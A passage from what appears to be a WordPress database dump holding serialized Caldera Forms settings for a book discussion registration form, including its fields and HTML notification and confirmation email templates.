Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_3657255\";a:8:{s:2:\"ID\";s:11:\"fld_3657255\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:5:\"Phone\";s:4:\"slug\";s:5:\"phone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:15:\"%email_address%\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:20:\"Book Discussion Form\";s:13:\"email_message\";s:8188:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"color3-color\" style=\"font-size: 25px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; border: 2px solid #954c08; background-color: #ffffff;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\"><strong>New Admin Web Submission</strong></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400; width: 62.6951%; height: 357px;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 82px;\">\n<td style=\"padding: 20px 30px 25px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px; height: 82px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion - Registration Request</p>\n</td>\n</tr>\n<tr style=\"height: 169px;\">\n<td style=\"padding: 20px 30px 15px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px; height: 169px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"color3-color\" style=\"font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">You have a new<strong><em> Book Discussion</em> </strong>form submission.</p>\n<p class=\"\" style=\"font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A user on the <i><strong>Eckankar In Colorado</strong></i> website has submitted this form. The following person has requested contact with an ECK representative.</p>\n</td>\n</tr>\n<tr style=\"height: 106px;\">\n<td style=\"height: 106px;\" bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; font-size: 15px;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">If you have any questions regarding the origin of this form, please feel free to contact the <a href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado </a>webmaster: webmaster@eckankar-colorado.org</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:8908:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #e8f2fc;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\">About Your Web Submission Request</p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 18px; color: #4c4747; line-height: 31px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Hello %first_name%!</p>\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 400; font-size: 16px; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Thank you for signing up for one of our ECK Book Discussion Classes. We look forward to meeting you! Below is the information that you have submitted to us, which will only be used to respond to your request.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">You are receiving this email because you have submitted a request through the Eckankar in Colorado website.</p>\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">If you have any questions regarding the origin of this form, please feel free to get in touch — we\'re always happy to help out.</p>\n<p class=\"\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"\" style=\"font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; font-size: 17px;\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">Contact Us</a></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}'),(36,'CF60874262a3d99','revision','a:22:{s:2:\"ID\";s:15:\"CF60874262a3d99\";s:13:\"_last_updated\";s:31:\"Tue, 27 Apr 2021 18:51:07 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:28:\"Book Discussion Registration\";s:10:\"scroll_top\";i:1;s:7:\"success\";s:140:\"<center>Thank you for your interest in joining an ECK Book Discussion!<br>\nYou will be contacted soon regarding the class.</center>									\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"3:1\";s:11:\"fld_3657255\";s:3:\"3:2\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:16:\"12|6:6|6:6|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:109:\"<h2>ECK Book Discussion Registration</h2>\nYour information will only be used to respond to your request.\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_3657255\";a:8:{s:2:\"ID\";s:11:\"fld_3657255\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:5:\"Phone\";s:4:\"slug\";s:5:\"phone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:15:\"%email_address%\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:20:\"Book Discussion Form\";s:13:\"email_message\";s:8021:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), 